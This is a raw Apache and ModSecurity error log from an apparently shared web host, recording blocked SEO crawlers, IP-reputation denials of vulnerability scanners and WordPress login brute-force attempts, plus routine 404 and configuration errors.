[Tue May 26 17:41:07.660613 2026] [security2:error] [pid 912729:tid 912959] [client 66.249.66.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWN20oCupl_NMj3qz-dpgAAAOc"]
[Tue May 26 17:41:08.053124 2026] [security2:error] [pid 912729:tid 912933] [client 5.39.1.224:40460] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "haddingtonwines.com"] [uri "/robots.txt"] [unique_id "ahWN3EoCupl_NMj3qz-dtAAAAM0"]
[Tue May 26 17:41:08.053253 2026] [security2:error] [pid 912729:tid 912933] [client 5.39.1.224:40460] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "haddingtonwines.com"] [uri "/robots.txt"] [unique_id "ahWN3EoCupl_NMj3qz-dtAAAAM0"]
[Tue May 26 17:41:08.242741 2026] [security2:error] [pid 912729:tid 912863] [client 67.218.5.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWN3EoCupl_NMj3qz-dugAAAIk"], referer: https://anujtradingco.com
[Tue May 26 17:41:09.463460 2026] [security2:error] [pid 912729:tid 912980] [client 148.113.130.111:36222] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "haddingtonwines.com"] [uri "/"] [unique_id "ahWN3UoCupl_NMj3qz-d3gAAAPw"]
[Tue May 26 17:41:09.463555 2026] [security2:error] [pid 912729:tid 912980] [client 148.113.130.111:36222] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "haddingtonwines.com"] [uri "/"] [unique_id "ahWN3UoCupl_NMj3qz-d3gAAAPw"]
[Tue May 26 17:41:09.488207 2026] [security2:error] [pid 912729:tid 912797] [remote 216.73.216.30:41175] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWN3UoCupl_NMj3qz-d4QABAUM"]
[Tue May 26 17:41:09.902908 2026] [security2:error] [pid 912729:tid 912876] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN3UoCupl_NMj3qz-d4gAAAJY"]
[Tue May 26 17:41:10.854646 2026] [security2:error] [pid 912729:tid 912920] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN3koCupl_NMj3qz-d-wAAAMA"]
[Tue May 26 17:41:12.646178 2026] [security2:error] [pid 912729:tid 912981] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN4EoCupl_NMj3qz-eLAAAAP0"]
[Tue May 26 17:41:14.233619 2026] [security2:error] [pid 912729:tid 912813] [remote 216.73.216.30:41175] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWN4koCupl_NMj3qz-eWgAA91M"]
[Tue May 26 17:41:15.447928 2026] [security2:error] [pid 912729:tid 912937] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN40oCupl_NMj3qz-ecgAAANE"]
[Tue May 26 17:41:17.716688 2026] [security2:error] [pid 912729:tid 912896] [client 223.235.98.214:23474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWN5UoCupl_NMj3qz-exAAAAKg"]
[Tue May 26 17:41:17.716842 2026] [security2:error] [pid 912729:tid 912896] [client 223.235.98.214:23474] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWN5UoCupl_NMj3qz-exAAAAKg"]
[Tue May 26 17:41:18.029301 2026] [security2:error] [pid 912729:tid 912865] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN5UoCupl_NMj3qz-evQAAAIs"]
[Tue May 26 17:41:19.235135 2026] [security2:error] [pid 912729:tid 912845] [remote 216.73.216.30:41175] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWN50oCupl_NMj3qz-e6wAA33M"]
[Tue May 26 17:41:20.214340 2026] [security2:error] [pid 912729:tid 912921] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN50oCupl_NMj3qz-e9wAAAME"]
[Tue May 26 17:41:21.905395 2026] [security2:error] [pid 912729:tid 912894] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN6UoCupl_NMj3qz-fMwAAAKY"]
[Tue May 26 17:41:22.362286 2026] [core:error] [pid 912729:tid 912885] [client 74.7.241.175:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:41:22.362309 2026] [core:error] [pid 912729:tid 912885] [client 74.7.241.175:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:41:22.362426 2026] [security2:error] [pid 912729:tid 912885] [client 74.7.241.175:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/index.php"] [unique_id "ahWN6koCupl_NMj3qz-fSQAAAJ8"]
[Tue May 26 17:41:22.363135 2026] [security2:error] [pid 912729:tid 912886] [client 74.7.241.175:57900] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/robots.txt"] [unique_id "ahWN6koCupl_NMj3qz-fRgAAoAQ"]
[Tue May 26 17:41:23.945090 2026] [security2:error] [pid 912729:tid 912987] [client 195.226.194.95:60676] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "velanstore.ca"] [uri "/wp-content/plugins/suretriggers/readme.txt"] [unique_id "ahWN60oCupl_NMj3qz-fawAAAQM"]
[Tue May 26 17:41:23.946119 2026] [security2:error] [pid 912729:tid 912958] [client 195.226.194.95:60666] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "velanstore.freshmindsolutions.com"] [uri "/wp-content/plugins/suretriggers/readme.txt"] [unique_id "ahWN60oCupl_NMj3qz-fbAAAAOY"]
[Tue May 26 17:41:24.702530 2026] [security2:error] [pid 912729:tid 912923] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN7EoCupl_NMj3qz-fdAAAAMM"]
[Tue May 26 17:41:26.999478 2026] [security2:error] [pid 912729:tid 912911] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN7koCupl_NMj3qz-ftAAAALc"]
[Tue May 26 17:41:28.095137 2026] [security2:error] [pid 912729:tid 912872] [client 223.235.98.214:13200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWN8EoCupl_NMj3qz-f2gAAAJI"]
[Tue May 26 17:41:28.095299 2026] [security2:error] [pid 912729:tid 912872] [client 223.235.98.214:13200] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWN8EoCupl_NMj3qz-f2gAAAJI"]
[Tue May 26 17:41:28.293976 2026] [security2:error] [pid 912729:tid 912764] [remote 74.7.241.58:54196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWN8EoCupl_NMj3qz-f5AAAmiI"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/en
[Tue May 26 17:41:29.241726 2026] [security2:error] [pid 912729:tid 912770] [remote 216.73.216.30:56886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWN8UoCupl_NMj3qz-f_wABAig"]
[Tue May 26 17:41:29.524212 2026] [security2:error] [pid 912729:tid 912905] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN8UoCupl_NMj3qz-f_gAAALE"]
[Tue May 26 17:41:30.823050 2026] [security2:error] [pid 912729:tid 912856] [remote 173.212.245.56:38110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.245.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWN8koCupl_NMj3qz-gJAAAq34"]
[Tue May 26 17:41:31.634040 2026] [autoindex:error] [pid 912729:tid 912985] [client 35.200.195.35:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:41:31.737537 2026] [security2:error] [pid 912729:tid 912904] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN80oCupl_NMj3qz-gOwAAALA"]
[Tue May 26 17:41:33.329836 2026] [security2:error] [pid 912729:tid 912919] [client 185.191.171.1:13242] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/4/"] [unique_id "ahWN9UoCupl_NMj3qz-gdwAAAL8"]
[Tue May 26 17:41:33.330009 2026] [security2:error] [pid 912729:tid 912919] [client 185.191.171.1:13242] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/4/"] [unique_id "ahWN9UoCupl_NMj3qz-gdwAAAL8"]
[Tue May 26 17:41:34.132672 2026] [security2:error] [pid 912729:tid 912918] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN9UoCupl_NMj3qz-ggQAAAL4"]
[Tue May 26 17:41:35.252286 2026] [security2:error] [pid 912729:tid 912953] [client 201.106.38.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN9koCupl_NMj3qz-gpAAAAOE"]
[Tue May 26 17:41:36.529964 2026] [security2:error] [pid 912729:tid 912957] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN-EoCupl_NMj3qz-g2QAAAOU"]
[Tue May 26 17:41:36.797075 2026] [autoindex:error] [pid 912729:tid 912950] [client 43.130.74.193:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.aeromodellingconsultants.com
[Tue May 26 17:41:36.871972 2026] [security2:error] [pid 912729:tid 912872] [client 65.111.10.92:41233] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWN-EoCupl_NMj3qz-g7QAAAJI"], referer: https://cyclet24.com/s/cdn/?cagmedya.com
[Tue May 26 17:41:36.975398 2026] [security2:error] [pid 912729:tid 912897] [client 114.119.144.127:64933] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.usteve.com"] [uri "/Features.htm"] [unique_id "ahWN-EoCupl_NMj3qz-g-wAAAKk"], referer: https://www.usteve.com/Features.htm
[Tue May 26 17:41:37.188479 2026] [security2:error] [pid 912729:tid 912940] [client 89.124.83.75:59609] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 75.83.124.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahWN-EoCupl_NMj3qz-g-gAAANQ"], referer: http://anujtradingco.com/2025/05/25/hello-world/
[Tue May 26 17:41:37.188650 2026] [security2:error] [pid 912729:tid 912940] [client 89.124.83.75:59609] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahWN-EoCupl_NMj3qz-g-gAAANQ"], referer: http://anujtradingco.com/2025/05/25/hello-world/
[Tue May 26 17:41:38.812479 2026] [security2:error] [pid 912729:tid 912874] [client 223.235.98.214:6180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWN-koCupl_NMj3qz-hJgAAAJQ"]
[Tue May 26 17:41:38.812673 2026] [security2:error] [pid 912729:tid 912874] [client 223.235.98.214:6180] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWN-koCupl_NMj3qz-hJgAAAJQ"]
[Tue May 26 17:41:38.912894 2026] [security2:error] [pid 912729:tid 912936] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN-koCupl_NMj3qz-hIQAAANA"]
[Tue May 26 17:41:39.879535 2026] [http2:info] [pid 924957:tid 924957] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 17:41:39.944324 2026] [security2:error] [pid 924957:tid 925090] [client 202.55.67.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWN--Yv2AvxeXULfJdHDQAAAAM"], referer: https://www.anujtradingco.com/
[Tue May 26 17:41:40.410363 2026] [security2:error] [pid 912729:tid 912816] [remote 20.219.17.202:60802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.17.219.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWN_EoCupl_NMj3qz-hTAAA21Y"]
[Tue May 26 17:41:41.144442 2026] [security2:error] [pid 924957:tid 925114] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN_OYv2AvxeXULfJdHIgAAABs"]
[Tue May 26 17:41:41.148795 2026] [security2:error] [pid 924957:tid 925154] [client 202.55.67.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWN_eYv2AvxeXULfJdHNwAAAEM"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1248290&moderation-hash=d1330e92f2b1297b8d3aa9e9c0b44251
[Tue May 26 17:41:43.108183 2026] [security2:error] [pid 924957:tid 924963] [remote 142.44.233.91:34206] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "hassina-foundation.com"] [uri "/robots.txt"] [unique_id "ahWN_-Yv2AvxeXULfJdHdgAAMAU"]
[Tue May 26 17:41:43.108418 2026] [security2:error] [pid 924957:tid 925135] [client 142.44.233.91:34206] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "hassina-foundation.com"] [uri "/robots.txt"] [unique_id "ahWN_-Yv2AvxeXULfJdHdgAAMAU"]
[Tue May 26 17:41:43.437408 2026] [security2:error] [pid 924957:tid 925070] [remote 35.233.46.64:2367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 64.46.233.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWN_-Yv2AvxeXULfJdHggAAQnA"]
[Tue May 26 17:41:43.557407 2026] [security2:error] [pid 924957:tid 925143] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN_-Yv2AvxeXULfJdHeQAAADg"]
[Tue May 26 17:41:44.564081 2026] [security2:error] [pid 924957:tid 925076] [remote 142.44.220.244:30554] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "hassina-foundation.com"] [uri "/"] [unique_id "ahWOAOYv2AvxeXULfJdHvQAAfnY"]
[Tue May 26 17:41:44.564306 2026] [security2:error] [pid 924957:tid 925213] [client 142.44.220.244:30554] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "hassina-foundation.com"] [uri "/"] [unique_id "ahWOAOYv2AvxeXULfJdHvQAAfnY"]
[Tue May 26 17:41:44.781469 2026] [security2:error] [pid 924957:tid 925094] [client 74.7.230.31:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWOAOYv2AvxeXULfJdHrgAAAAc"]
[Tue May 26 17:41:44.781504 2026] [security2:error] [pid 924957:tid 925094] [client 74.7.230.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWOAOYv2AvxeXULfJdHrgAAAAc"]
[Tue May 26 17:41:44.782476 2026] [security2:error] [pid 924957:tid 925206] [client 74.7.230.31:48512] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/robots.txt"] [unique_id "ahWOAOYv2AvxeXULfJdHrAAAd3Q"]
[Tue May 26 17:41:45.952200 2026] [security2:error] [pid 924957:tid 925114] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOAeYv2AvxeXULfJdH3AAAABs"]
[Tue May 26 17:41:46.681213 2026] [security2:error] [pid 924957:tid 925130] [client 16.148.188.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.lifestylemne.me"] [uri "/index.php"] [unique_id "ahWOAuYv2AvxeXULfJdIAAAAACs"]
[Tue May 26 17:41:48.330081 2026] [security2:error] [pid 924957:tid 925156] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOA-Yv2AvxeXULfJdIJAAAAEU"]
